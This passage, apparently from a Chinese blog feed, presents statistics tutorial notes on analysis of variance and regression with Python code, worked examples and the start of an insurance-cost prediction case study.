    在各个总体$A_i$下, 样本数据$X_{ij}$与其总体均值$\bar X_i$的偏差平方和反映了抽样的随机性引起的样本数据$X_{ij}$的波动, 又称组内平方和, 该平方和反映的是随机误差的大小

    $$SSE=\Sigmak_{i=1}\Sigma{n_i}{j=1}(X{ij}-\bar{X_i})^2$$

    1
    2
    3
    4
    5
    SSE = 0
    for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
    SSE += (j - X_bar[i]) ** 2
    SSE
    2708.0
    6 总离差平方和的分解

    $$SST=SSE+SSA$$

    7 各自由度

    $SST$的自由度为$n-1$, 其中$n$为全部观察值的个数

    误差项离差平方和($SSE$)的自由度为$k-1$, 其中$k$为因素水平(总体)的个数

    水平项离差平方和($SSA$)的自由度为$n-k$

    8 各误差的均方差 MSA 和 MSE

    组间方差$SSA$的均方差记为$MSA$

    组内方差$SSE$的均方差记为$MSE$

    计算方法是用误差平方 除以 相应的自由度

    设置检验统计量

    $$F=\frac{SSA/(k-1)}{SSE/(n-k)}=\frac{MSA}{MSE}F(k-1, n-k)$$

    1
    2
    3
    4
    k = len(data[1])
    n = len(data[data!= np.array(None)])
    F = (SSA / (k - 1)) / (SSE / (n - k))
    F
    3.4066426904716036

    上述分析的结果可排成表格的形式, 称为单因素实验方差分析表:

    方差来源 误差平方和 自由度 均方差 F 值
    组间 SSA k-1 MSA MSA/MSE
    组内 SSE n-k MSE
    总和 SST=SSE+SSA n-1

    15.3.2 方差分析中的多重比较

    为了进一步了解因素 A 的各个总体对观测变量的具体影响效果

    多重比较检验就是通过对各个总体观测变量均值的逐对比较, 来进一步检验到底哪些均值之间存在差异, 并找出最优水平.

    如果原假设$H_0:\mu_i=\mu_j,i,j=1,2,…,r,i\ne j$成立, 检验统计量应较小, 因此拒绝域为$|\bar X_i-\bar X_j|>t_{\alpha/2}\sqrt{MSE(\frac{1}{n
    _i}+\frac{1}{n_j})}$

    如果满足拒绝域条件, 则认为$\mu_i$与$\mu_j$有显著性差异, 否则认为它们之间没有显著性差异

    例 15.2
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import pandas as pd
    import numpy as np

    data = np.array([[26.5, 31.2, 27.9, 30.8],
    [28.7, 28.3, 25.1, 29.6],
    [25.1, 30.8, 28.5, 32.4],
    [29.1, 27.9, 24.2, 31.7],
    [27.2, 29.6, 26.5, 32.8]])
    df = pd.DataFrame(data, index=range(1, 6), columns=["无色", "粉色", "橘黄色", "绿色"])
    df.index.name = "样本"
    df
    无色 粉色 橘黄色 绿色
    样本
    1 26.5 31.2 27.9 30.8
    2 28.7 28.3 25.1 29.6
    3 25.1 30.8 28.5 32.4
    4 29.1 27.9 24.2 31.7
    5 27.2 29.6 26.5 32.8
    1
    2
    3
    4
    X_bar = []
    for i in data.T:
    X_bar.append(np.round(i.mean(), 2))
    X_bar
    [27.32, 29.56, 26.44, 31.46]
    1
    2
    3
    4
    5
    SSE = 0
    for i in range(data.shape[1]):
    for j in data.T[i][data.T[i] != np.array(None)]:
    SSE += (j - X_bar[i]) ** 2
    SSE
    39.083999999999975
    1
    2
    3
    4
    n = data.size
    k = data.shape[1]
    MSE = SSE / (n - k)
    MSE
    2.4427499999999984

    令显著性水平$\alpha=0.05,t_{\alpha/2}(16)=2.12,n_i=n_j=5,i,j=1,2,3,4,5$

    $t_{\alpha/2}\sqrt{MSE(\frac{1}{n_i}+\frac{1}{n_j})}=2.096$

    1
    2
    3
    4
    5
    from scipy.stats import t

    alpha = 0.05
    t_alpha_div_2 = t.ppf(1 - alpha / 2, (n - k))
    t_alpha_div_2
    2.1199052992210112
    1
    np.round(t_alpha_div_2 * np.sqrt(MSE * (1 / data.shape[0] + 1 / data.shape[0])), 3)
    2.095
    1
    2
    3
    for i in range(len(X_bar) - 1):
    for j in range(i + 1, len(X_bar)):
    print("|\\bar X_{} - \\bar X_{}| ={})".format(i + 1, j + 1, np.round(np.abs(X_bar[i]-X_bar[j]), 2)))
    |\bar X_1 - \bar X_2| =2.24)|\bar X_1 - \bar X_3| =0.88)|\bar X_1 - \bar X_4| =4.14)|\bar X_2 - \bar X_3| =3.12)|\bar X_2 - \bar X_4| =1.9)|\bar X_3 - \bar X_4| =5.02)

    依据上面结果可得出相应的影响效果,

    如$|\bar X_1 - \bar X_2|>2.095$, 则说明$X_1$和$X_2$有显著性差异, 也就是说明无色和粉色对产品销售的影响有显著性差异

    $|\bar X_2 - \bar X_4|<2.095$, 说明$X_2$和$X_4$没有显著性差异, 也就是说粉色和绿色对产品销售的影响没有显著性差异

    15.3.3 多因素方差分析

    • 交互效应的双因素离差平法和分解: $SST=SSA+SSB+SSE$

    • 交互效应的双因素离差平方和分解: $SST=SSA+SSB+SSAB+SSE$

    方差来源误差平方和自由度均方差 MSF 值
    因素 A$SSA$$s-1$$MSA=\frac{SSA}{s-1}$$F_A=\frac{MSA}{MSE}$
    因素 B$SSB$$r-1$$MSB=\frac{SSB}{r-1}$$F_B=\frac{MSB}{MSE}$
    因素 AB 交互作用$SSAB$$(r-1)(s-1)$$MSAB=\frac{SSAB}{(r-1)(s-1)}$$F_{AB}=\frac{MSAB}{MSE}$
    误差$SSE$$rs(m-1)$$MSE=\frac{SSE}{rs(m-1)}$
    总和$SST$$rsm-1$
    统计量服从分布
    $F_A=\frac{MSA}{MSE}$$\left[s-1,rs(m-1)\right]$

    15.3.3 多因素方差分析

    • 交互效应的双因素离差平法和分解: $SST=SSA+SSB+SSE$

    • 交互效应的双因素离差平方和分解: $SST=SSA+SSB+SSAB+SSE$

    方差来源误差平方和自由度均方差 MSF 值
    因素 A$SSA$$s-1$$MSA=\frac{SSA}{s-1}$$F_A=\frac{MSA}{MSE}$
    因素 B$SSB$$r-1$$MSB=\frac{SSB}{r-1}$$F_B=\frac{MSB}{MSE}$
    因素 AB 交互作用$SSAB$$(r-1)(s-1)$$MSAB=\frac{SSAB}{(r-1)(s-1)}$$F_{AB}=\frac{MSAB}{MSE}$
    误差$SSE$$rs(m-1)$$MSE=\frac{SSE}{rs(m-1)}$
    总和$SST$$rsm-1$
    统计量服从分布
    $F_A=\frac{MSA}{MSE}$$\left[s-1,rs(m-1)\right]$

    15.3.3 多因素方差分析

    • 交互效应的双因素离差平法和分解: $SST=SSA+SSB+SSE$

    • 交互效应的双因素离差平方和分解: $SST=SSA+SSB+SSAB+SSE$

    方差来源误差平方和自由度均方差 MSF 值
    因素 A$SSA$$s-1$$MSA=\frac{SSA}{s-1}$$F_A=\frac{MSA}{MSE}$
    因素 B$SSB$$r-1$$MSB=\frac{SSB}{r-1}$$F_B=\frac{MSB}{MSE}$
    因素 AB 交互作用$SSAB$$(r-1)(s-1)$$MSAB=\frac{SSAB}{(r-1)(s-1)}$$F_{AB}=\frac{MSAB}{MSE}$
    误差$SSE$$rs(m-1)$$MSE=\frac{SSE}{rs(m-1)}$
    总和$SST$$rsm-1$
    统计量服从分布
    $F_A=\frac{MSA}{MSE}$$\left[s-1,rs(m-1)\right]$
    $F_B=\frac{MSB}{MSE}$$\left[r-1,rs(m-1)\right]$
    $F_{AB}=\frac{MSAB}{MSE}$$\left[(r-1)(s-1),rs(m-1)\right]$

    m 为试验次数($\ge2$)

    例 15.3

    有$s=4$个品牌的彩电在$r=5$个地区销售, 为分析品牌和地区对销售量是否有影响, 每个品牌在各个地区的销售量如下, 试分析品牌和地区对销售量是否有显著影响?$(\alpha=0.05)$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import numpy as np
    import pandas as pd

    data = np.array([[365, 350, 343, 340, 323],
    [345, 368, 363, 330, 333],
    [358, 323, 353, 343, 308],
    [288, 280, 298, 260, 298]])
    df = pd.DataFrame(data, columns=["B1", "B2", "B3", "B4", "B5"],
    index=["A1", "A2", "A3", "A4"])
    df.index.name = "品牌销售表(因素 A)"
    df.columns.name = "销售地区(因素 B)"
    df
    销售地区(因素 B) B1 B2 B3 B4 B5
    品牌销售表(因素 A)
    A1 365 350 343 340 323
    A2 345 368 363 330 333
    A3 358 323 353 343 308
    A4 288 280 298 260 298

    $SST=3652+3502+…+2982-\frac{65692}{20}=17888.95$

    1
    2
    SST = (data ** 2).sum() - data.sum() ** 2 / data.size
    SST
    17888.950000000186

    $SSA=\frac{1}{5}(17212+17392+…+14242)-\frac{65692}{20}=13004.55$

    1
    2
    3
    4
    5
    6
    SSA = 0
    for i in data:
    SSA += i.sum() ** 2
    SSA /= data.shape[1]
    SSA -= data.sum() ** 2 / data.size
    SSA
    13004.55000000028

    $SSB=\frac{1}{4}(13562+13212+…+12622)-\frac{65692}{20}=2011.7$

    1
    2
    3
    4
    5
    6
    SSB = 0
    for i in data.T:
    SSB += i.sum() ** 2
    SSB /= data.shape[0]
    SSB -= data.sum() ** 2 / data.size
    SSB
    2011.7000000001863

    $SSE=SST-SSA-SSB=2872.7$

    1
    2
    SSE = SST - SSA - SSB
    SSE
    2872.6999999997206
    差异源平方和自由度均方F 值
    品牌(因素 A)SSA = 13004.55s - 1 = 3MSA = SSA / (s - 1) = 4334.85MSA / MSE = 18.10777
    地区(因素 B)SSB = 2011.7r - 1 = 4MSB = SSB / (r - 1) = 502.925MSB / MSE = 2.100846
    误差SSE = 2872.7(r - 1)(s - 1) = 12MSE = SSE / (rs(m - 1)) = 239.3917
    总和SST = SSA + SSB + SSE = 17888.95rsm - 1 = 19
    • 由于$F_A=18.108>F_{0.95}(3, 12)=3.49$, 说明彩电的品牌对销售量有显著影响

    • 由于$F_B=2.101<F_{0.95}(4, 12)=3.26$, 说明销售地区对彩电的销售没有显著影响

    15.4 综合实例——连锁餐饮用户评级分析

    15.4.1 单因素方差实例分析

    某连锁餐饮在 3 个城市用户评分资料如表所示,已知各城市用户评分的分布近似与正态等方差,是以 95%的可靠性判断城市对用户评分是否有显著影响?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    from scipy.stats import f_oneway
    import scipy.stats as stats
    import numpy as np
    import pandas as pd
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm

    cityA = [10,9,9,8,8,7,7,8,8,9]
    cityB = [10,8,9,8,7,7,7,8,9,9]
    cityC = [9,9,8,8,8,7,6,9,8,9]
    df = pd.DataFrame(np.vstack((cityA, cityB, cityC)), index=['A', 'B', 'C'])
    df.columns.name = "用户评分"
    df.index.name = "城市"
    df
    用户评分 0 1 2 3 4 5 6 7 8 9
    城市
    A 10 9 9 8 8 7 7 8 8 9
    B 10 8 9 8 7 7 7 8 9 9
    C 9 9 8 8 8 7 6 9 8 9
    方法 1 使用 scipy.stats.f_oneway()方法
    1
    2
    3
    4
    5
    6
    7
    8
    9
    # 首先检查方差是否相等, 在使用 f_oneway 函数之前需要先检验方差齐性, 这里使用了 levene 方差齐性检验
    """
    scipy.stats.levene(*samples, center='median', proportiontocut=0.05)
    对等方差执行 Levene 检验。
    小的 p-value 表明总体没有相等的方差。
    """
    (W, p) = stats.levene(cityA, cityB, cityC)
    if p < 0.05:
    print(('Warning: the p-value of the Levene test is <0.05: p = {0}'.format(p)))
    1
    2
    3
    4
    5
    6
    # 单因素方差分析
    # 第一种方法
    F_statistic, pVal = stats.f_oneway(cityA, cityB, cityC)
    print('单因素方差分析结果(f_oneway): F = {0}, and p = {1}'.format(F_statistic, pVal))
    if pVal < 0.05:
    print('One of the groups is significantly different.')
    单因素方差分析结果(f_oneway): F = 0.10150375939849626, and p = 0.9038208903685354
    方法 2 利用 statsmodels 库函数中包含的 anova_lm 模型, 使用线性 OLSModel 进行方差分析
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # 单因素方差分析
    # 第二种方法 statsmodel 库函数
    # 将数据存入 dataframe 中
    df = pd.DataFrame()
    names = locals()
    for city in ['A','B','C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city':city[-1], 'S':s})
    df = pd.concat([df, df_temp], ignore_index=True)
    # 使用线性 OLSModel 进行方差分析
    model = ols('S ~ city', df).fit()
    anovaResults = anova_lm(model)
    print('单因素方差分析结果(anova_lm):')
    print(anovaResults)
    df
    单因素方差分析结果(anova_lm):            df  sum_sq   mean_sq         F    PR(>F)city       2.0     0.2  0.100000  0.101504  0.903821Residual  27.0    26.6  0.985185       NaN       NaN
    city S
    0 A 10
    1 A 9
    2 A 9
    3 A 8
    4 A 8
    5 A 7
    6 A 7
    7 A 8
    8 A 8
    9 A 9
    10 B 10
    11 B 8
    12 B 9
    13 B 8
    14 B 7
    15 B 7
    16 B 7
    17 B 8
    18 B 9
    19 B 9
    20 C 9
    21 C 9
    22 C 8
    23 C 8
    24 C 8
    25 C 7
    26 C 6
    27 C 9
    28 C 8
    29 C 9
    3 手动计算各误差值, 实现单因素方差分析
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    from scipy.stats import f_oneway
    import scipy.stats as stats
    import numpy as np
    import pandas as pd

    cityA = [10,9,9,8,8,7,7,8,8,9]
    cityB = [10,8,9,8,7,7,7,8,9,9]
    cityC = [9,9,8,8,8,7,6,9,8,9]
    df = pd.DataFrame()
    names = locals()
    for city in ['A','B','C']:
    s = names['city%c' % city]
    df_temp = pd.DataFrame({'city':city[-1], 'S':s})
    df = pd.concat([df, df_temp], ignore_index=True)
    groups = df.groupby('city')
    # The "total sum-square" is the squared deviation from the mean
    ss_total = np.sum((df['S'] - df['S'].mean()) ** 2)
    # 计算 SSE 和 SSA
    (ss_treatments, ss_error) = (0, 0)
    for val, group in groups:
    ss_error += sum((group['S'] - group['S'].mean()) ** 2)
    ss_treatments += len(group) * (group['S'].mean() - df['S'].mean()) ** 2
    df_groups = len(groups) - 1
    df_residuals = len(df) - len(groups)
    F = (ss_treatments / df_groups) / (ss_error / df_residuals)
    df = stats.f(df_groups, df_residuals)
    p = df.sf(F)
    print(('单因素方差分析结果(手动计算): F = {0}, and p = {1}'.format(F, p)))
    单因素方差分析结果(手动计算): F = 0.1015037593984973, and p=0.9038208903685354

    由于$F<F_{0.05}(2, 27)=3.35$或$P>0.05$, 所以原假设成立, 不能认为城市对用户评分有影响

    15.4.2 多因素方差分析实例

    收集在环境等级(environment)和食材等级(ingredients)两个因素影响下的某连锁餐饮店的用户评价数据

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    #影响餐饮的 2 个因素:环境等级,食材等级
    from scipy import stats
    import pandas as pd
    import numpy as np
    from statsmodels.formula.api import ols
    from statsmodels.stats.anova import anova_lm
    environmental = [5,5,5,5,5,4,4,4,4,4,3,3,3,3,3,2,2,2,2,2,1,1,1,1,1]
    ingredients = [5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1,5,4,3,2,1]
    score = [5,5,4,3,2,5,4,4,3,2,4,4,3,3,2,4,3,2,2,2,3,3,3,2,1]
    data = {'E':environmental, 'I':ingredients, 'S':score} # E 表示环境, I 表示食材, S 表示分数
    df = pd.DataFrame(data)
    df
    E I S
    0 5 5 5
    1 5 4 5
    2 5 3 4
    3 5 2 3
    4 5 1 2
    5 4 5 5
    6 4 4 4
    7 4 3 4
    8 4 2 3
    9 4 1 2
    10 3 5 4
    11 3 4 4
    12 3 3 3
    13 3 2 3
    14 3 1 2
    15 2 5 4
    16 2 4 3
    17 2 3 2
    18 2 2 2
    19 2 1 2
    20 1 5 3
    21 1 4 3
    22 1 3 3
    23 1 2 2
    24 1 1 1

    利用 statsmodels 中的 anova_lm 模块进行多因素方差分析

    1
    2
    3
    4
    5
    6
    7
    8
    """
    符号意义:
    (~)隔离自变量和因变量(左边因变量, 右边自变量)
    (+)分离各个自变量
    """
    formula = 'S~E+I'
    results = anova_lm(ols(formula,df).fit() )
    print(results)
                df  sum_sq    mean_sq           F        PR(>F)E          1.0    7.22   7.220000   46.444444  7.580723e-07I          1.0   18.00  18.000000  115.789474  3.129417e-10Residual  22.0    3.42   0.155455         NaN           NaN

    由于$P 值很小$, 说明环境和食材两个因素对用户评分影响较大

    ]]>
    @@ -9969,7 +9969,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8014/ - 正文

    14 回归分析

    14.1 回归分析概述

    14.1.2 一元线性回归模型

    一般地, 如果自变量$x$与因变量$y$之间存在如下关系, 则可称为一元线性回归模型

    $$y=\beta_0+\beta_1x+\varepsilon, \varepsilon\sim N(0, \sigma^2)$$

    变量说明
    $x$自变量
    $y$因变量
    $\beta_0$回归常数
    $\beta_1$回归系数
    $\varepsilon$随机误差
    $\sigma^2$方差

    14.2 回归方程推导及作用

    14.2.1 回归方程

    通过观察$n$组样本观察值, 求出未知参数$\beta_0$和$\beta_1$, 记为$\hat{\beta_0}, \hat{\beta_1}$, 则称$\hat{y}=\hat{\beta_0}+\hat{\beta_1}x
    $为$y$关于$x$的经验回归方程, 简称回归方程

    14.2.2 参数的最小二乘法估计

    二乘~乘两次~平方

    基本原则: 最优拟合直线应该使各点到回归直线的距离之和最小, 即平方和最小

    $$Q=\Sigman_{i=1}(y_i-\beta_0-\beta_1x_i)2$$

    求得

    $$\left{\begin{matrix}
    \beta_0=\bar y-\beta_1\bar x\
    \beta_1=\frac{\Sigma^n_{i=1}x_iy_i-n\bar x\bar y}{\Sigman_{i=1}x2_i-n\bar x^2}=\frac{L_{xy}}{L_{xx}}
    \end{matrix}\right.$$

    例 14.2 求线性回归方程

    某公司为了研究某一类产品的产值$x$(万元)和其毛利润$y$(万元)之间的关系:

    import numpy as np
    import pandas as pd

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    df = pd.DataFrame(tang, columns=range(1, 11), index=["产值 x", "毛利润 y"])
    df.columns.name = "月份"
    df
    月份 1 2 3 4 5 6 7 8 9 10
    产值 x 100 110 120 130 140 150 160 170 180 190
    毛利润 y 45 51 54 61 66 70 74 78 85 89

    求毛利润$y$关于产值$x$的线性回归方程

    $n=10, \bar x=\frac{1}{n}\Sigma^n_{i=1}x_i=145, \bar y=\frac{1}{n}\Sigma^n_{i=1}y_i=67.3$

    n = len(tang[0])
    x_bar = tang[0].mean()
    y_bar= tang[1].mean()
    n, x_bar, y_bar
    (10, 145.0, 67.3)

    $L_{xx}=\Sigman_{i=1}x2_i-n\bar x^2=8250$

    $L_{xy}=\Sigma^n_{i=1}x_iy_i-n\bar x\bar y=3985$

    L_xx = (tang[0] ** 2).sum() - n * x_bar ** 2
    L_xy = (tang[0] * tang[1]).sum() - n * x_bar * y_bar
    L_xx, L_xy
    (8250.0, 3985.0)

    $\hat{\beta_1}=\frac{L_{xy}}{L_{xx}}=\frac{3985}{8250}=0.48303$

    $\hat{\beta_0}=\bar y-\hat{\beta_1}\bar x=67.3-0.48303 * 145 = -2.73935$

    得回归方程:

    $\hat y = -2.73935+0.48303x$

    beta_1 = L_xy / L_xx
    beta_0 = y_bar - beta_1 * x_bar
    beta_0, beta_1
    (-2.739393939393949, 0.48303030303030303)

    用 sklearn 实现线性回归方程

    import numpy as np
    import matplotlib.pyplot as plt
    import pandas as pd
    from sklearn import linear_model

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    regr = linear_model.LinearRegression()
    """
    https://www.iotword.com/2556.html
    .reshape(-1, 1)
    这是由于在 sklearn 中,所有的数据都应该是二维矩阵,哪怕它只是单独一行或一列(比如前面做预测时,仅仅只用了一个样本数据),
    所以需要使用 numpy 库的.reshape(1,-1)进行转换,而 reshape 的意思以及常用用法即上述内容。
    """
    regr.fit(tang[0].reshape(-1, 1), tang[1].reshape(-1, 1))
    regr.intercept_[0], regr.coef_[0][0]
    (-2.739393939393949, 0.48303030303030303)
    plt.figure()
    plt.scatter(tang[0], tang[1])
    x = np.array([100, 190])
    y = regr.predict(x.reshape(-1, 1))
    plt.plot(x, y, color="red", alpha=0.75)
    plt.show()

    png

    14.2.3 方差$\sigma^2$的估计

    $\sigma2$的无偏估计$(E(\hat{\sigma2})=0)\hat{\sigma^2}$:

    $\hat{\sigma^2}=\frac{1}{n-2}(L_{yy}-\hat{\beta_1}L_{xy})$其中$L_{yy}=\Sigma^n_{i=1}(y_i-\bar y)^2=\Sigma^n_{i=1}y^2_i-n\bar y^2$

    14.3 回归直线拟合度

    14.3.1 因变量 y 变化的指标项

    • 总离差平方和(SST): $\Sigma^n_{i=1}(y_i-\bar y_i)^2$, 反映了因变量的$n$个观察值$y_i$与其均值$\bar y$的总离差

    • 回归平方和(SSR): $\Sigma^n_{i=1}(\hat y_i-\bar y_i)^2$, 反映了因变量的总变化中, 有$x$与$y$之间的线性关系引起的$y$的变化部分

    • 残差平方和(SSE): $\Sigma^n_{i=1}(y_i-\hat y_i)^2$, 反映了除$x$对$y$的线性影响之外的其他因素对$y$变化的作用, 不能由回归直线来解释$y$的变化部分

    SST = SSR + SSE

    14.3.2 判定系数

    $$R^2=\frac{SSR}{SST}=\frac{\hat{\beta_1}L_{xy}}{L_{yy}}$$

    其实就是皮尔森相关系数的平方…

    14.4 线性回归的模型检验

    14.4.1 线性关系的显著性检验

    14.4.2 回归系数的显著性检验

    代公式吧…累了

    14.5 利用回归直线进行估计和预测

    什么是预测区间和置信区间

    • 预测区间估计: 对于自变量$x$的给定值$x_0$, 对$y$的预测值$\hat{y_0}$作点估计以区间估计(个别值)

    • 置信区间估计: 对于自变量$x$的给定值$x_0$, 估计$y_0$的平均值及估计区间, 即估计平均值$E(\hat{y_0})$

    代公式吧…累了

    14.6 多元与曲线回归问题

    14.6.1 多元线性回归分析

    多元线性回归就是多个自变量一个因变量的线性回归问题

    直接举例吧, 不证明了

    例 14.8

    设有 1 个表示 4 个特征(自变量)和 1 个因变量的数据集:

    import numpy as np
    import pandas as pd

    data = np.array([[2104, 5, 1, 15, 368],
    [1416, 3, 2, 10, 200],
    [1534, 3, 2, 5, 280],
    [852, 2, 1, 7, 126]])
    df = pd.DataFrame(data, columns=["x1", "x2", "x3", "x4", "y"])
    df
    x1 x2 x3 x4 y
    0 2104 5 1 15 368
    1 1416 3 2 10 200
    2 1534 3 2 5 280
    3 852 2 1 7 126

    利用"最小二乘法"求解回归模型时, 需要将特征(自变量)和因变量分解:

    $\mathbf{X}= \begin{bmatrix}
    1 & 2104 & 5 & 1 & 15 \
    1 & 1416 & 3 & 2 & 10 \
    1 & 1534 & 3 & 2 & 5 \
    1 & 852 & 2 & 1 & 7
    \end{bmatrix}$,
    $\mathbf{Y}= \begin{bmatrix}
    368 \
    200 \
    280 \
    126
    \end{bmatrix}$, $\mathbf{X}$增加 1 列对应的是$\beta_0$的系数

    X = np.hstack((np.mat([[1], [1], [1], [1]]),np.mat(data.T[0:4]).T))
    Y = np.mat(data.T[4]).T
    X, Y
    (matrix([[   1, 2104,    5,    1,   15],         [   1, 1416,    3,    2,   10],         [   1, 1534,    3,    2,    5],         [   1,  852,    2,    1,    7]]), matrix([[368],         [200],         [280],         [126]]))

    带入参数公式:$\beta=(\mathbf X^T\mathbf X)^{-1}(\mathbf X^T\mathbf Y)$, 解得

    beta = (X.T * X) ** (-1) * (X.T * Y)
    beta
    matrix([[-5632.],        [    8.],        [-4096.],        [    0.],        [    0.]])

    $y=-5632+8x_1-4096x_2$

    14.6.2 曲线回归分析

    曲线回归通常才用代数代换法把非线性形式转换为线性形式处理

    14.7 Python 工具包

    14.7.2 利用 statsmodels 实现回归分析

    例 14.11

    设产生 50~个-10~10 的等差数列数作为自变量$x$, 因变量为$y=3+6x+2x^3+e$, 其中$e$为误差项, $e\sim N(0, 1)$

    import numpy as np
    import matplotlib.pyplot as plt
    import statsmodels.api as sm # 最小二乘法
    from statsmodels.stats.outliers_influence import summary_table

    # 回归公式是: y=3+6x+2x^3+e
    # 1、设定数据量
    nsample = 50
    # 2、创建一个表示 x 的 array。这里,设 x 的值是-10 到 10 等差排列,共 50 个数。
    x = np.linspace(-10,10, nsample)
    X = np.column_stack((x,x**3))
    # 3、使用 sm.add_constant() 在 array 上加入一列常项 1。
    X = sm.add_constant(X) #线性组合,在原始数据前加 1
    # 4、设置模型里的 β0,β1,β2,这里要设置成 3、6 和 2。
    beta = np.array([3,6,2]) #β0, β1,β2 分别为 3、6 和 2
    #5、误差分析,在数据中加上误差项。
    e = np.random.normal(size=nsample)
    # 6、实际值 y
    y = np.dot(X, beta) + e # 回归公式是: y = 3 + 6x + 2x ^ 3 + e
    # 7、最小二乘法
    model = sm.OLS(y,X)
    # 8、拟合数据
    res = model.fit()
    # 9、获取结果,输出图形
    # 调取计算出的拟合回归模型参数即回归系数
    print("回归方程的参数 ===",res.params)
    # 调用拟合结果的 fittedvalues 得到拟合的 y_pred 值
    y_pred = res.fittedvalues
    # 将拟合结果画出来
    fig, ax = plt.subplots()
    ax.scatter(x, y, label="training data")
    ax.plot(x,y_pred, 'r', label='predict')
    ax.legend()
    ax.set(xlabel='x', ylabel='y')
    plt.show()
    # 将回归拟合的摘要全部打印出来
    res.summary()
    回归方程的参数 === [2.98049789 6.02186784 1.99927762]

    png

    OLS Regression Results
    Dep. Variable: y R-squared: 1.000
    Model: OLS Adj. R-squared: 1.000
    Method: Least Squares F-statistic: 2.098e+07
    Date: Mon, 25 Jul 2022 Prob (F-statistic): 1.44e-140
    Time: 15:39:09 Log-Likelihood: -64.732
    No. Observations: 50 AIC: 135.5
    Df Residuals: 47 BIC: 141.2
    Df Model: 2
    Covariance Type: nonrobust
    coef std err t P>|t| [0.025 0.975]
    const 2.9805 0.129 23.138 0.000 2.721 3.240
    x1 6.0219 0.055 109.986 0.000 5.912 6.132
    x2 1.9993 0.001 2486.102 0.000 1.998 2.001
    Omnibus: 4.258 Durbin-Watson: 1.994
    Prob(Omnibus): 0.119 Jarque-Bera (JB): 3.257
    Skew: 0.437 Prob(JB): 0.196
    Kurtosis: 3.894 Cond. No. 401.


    Notes:
    [1] Standard Errors assume that the covariance matrix of the errors is correctly specified.

    statsmodels 中的 summary 解读(使用 OLS)

    14.8 综合分析——个人医疗保费预测服务

    保险公司向保险人收取的保险费,必须高于支付给被保险人的保险费才能获利。

    以医疗费用为例,通过分析病人的数据,来预测这部分群体的平均医疗费用,为年度保费价格的设定提供参考。

    通过不同病人的病人的数据来预测医疗费用,因为因变量是一个连续的值,所以这个问题是一个回归问题。

    准备工作:调用相关库

    import numpy as np
    import pandas as pd
    # 导入数据可视化包及缺失值处理相关的工具包 data visualization and missing values
    import matplotlib.pyplot as plt
    import seaborn as sns # seaborn 库
    %matplotlib inline
    #导入缺失值处理的库
    import missingno as msno # 缺失值
    # 机器学习的工具包 machine learning
    from sklearn.preprocessing import StandardScaler # 标准化库
    from sklearn.model_selection import train_test_split, cross_val_score # 分割数据集,交叉验证评分

    1 获取数据和观察数据

    # 获取数据
    data = pd.read_csv("insurance.csv")
    # 查看数据大小
    data.shape
    (1338, 7)
    # 查看数据的列名
    data.columns
    Index(['age', 'sex', 'bmi', 'children', 'smoker', 'region', 'charges'], dtype='object')
    # 查看数据的前 5 行
    data.head()
    age sex bmi children smoker region charges
    0 19 female 27.900 0 yes southwest 16884.92400
    1 18 male 33.770 1 no southeast 1725.55230
    2 28 male 33.000 3 no southeast 4449.46200
    3 33 male 22.705 0 no northwest 21984.47061
    4 32 male 28.880 0 no northwest 3866.85520
    变量描述
    age年龄(不超过 64 岁)
    sex性别
    bmi体重(kg)/身高(米)²
    children孩子/受抚养者数量
    smoker吸烟情况
    region居住地(美国各地理区域)
    charges因变量, 当前数据人上年度保险的额度
    # 查看数据类型
    data.dtypes
    age           int64sex          objectbmi         float64children      int64smoker       objectregion       objectcharges     float64dtype: object
    # 生成描述性统计
    data.describe()
    age bmi children charges
    count 1338.000000 1338.000000 1338.000000 1338.000000
    mean 39.207025 30.663397 1.094918 13270.422265
    std 14.049960 6.098187 1.205493 12110.011237
    min 18.000000 15.960000 0.000000 1121.873900
    25% 27.000000 26.296250 0.000000 4740.287150
    50% 39.000000 30.400000 1.000000 9382.033000
    75% 51.000000 34.693750 2.000000 16639.912515
    max 64.000000 53.130000 5.000000 63770.428010
    (1) 缺失值处理
    • 若缺失值意义不大, 可以直接删除

    如果缺失值有意义:

    • 缺失值较少, 可以直接去掉

    • 用已有的值的平均值或众数代替缺失值

    • 用已知的数据作回归模型, 进行预测, 再用其他特征数据预测缺失值

    # 可视化缺失值
    sns.set(style="ticks") # 设置样式背景
    msno.matrix(data)
    <AxesSubplot:>

    png

    可惜了, 没有缺失值

    2 探索数据和准备数据

    (2) 特征工程

    从原始数据中提取到的特征的好坏直接影响模型的效果, 特征工程就是从原式数据中最大限度地提取特征, 以供机器学习和算法使用

    类型提取方法
    数值类型直接使用或进行标准化处理
    时间序列转化成单独的年月日
    分类数据使用标签编码(类别只有两个, 如男=1, 女=0)或独热编码(类别超过两个)
    其他类型独热编码

    标签编码: 使用 map 函数对数据进行重新定义Pandas 中的宝藏函数-map

    # 将是否吸烟者的值映射为数值,yes 对应数值 1,no 对应数值 0
    smoker_Dict = {'yes':1,'no':0}
    data['smoker'] = data['smoker'].map(smoker_Dict)
    data.head()
    # 将性别的值映射为数值,男(male)对应数值 1,女(female)对应数值 0
    sex_Dict = {'female':0,'male':1}
    data['sex']= data['sex'].map(sex_Dict)
    data.head()
    age sex bmi children smoker region charges
    0 19 0 27.900 0 1 southwest 16884.92400
    1 18 1 33.770 1 0 southeast 1725.55230
    2 28 1 33.000 3 0 southeast 4449.46200
    3 33 1 22.705 0 0 northwest 21984.47061
    4 32 1 28.880 0 0 northwest 3866.85520
    classes = ['region']
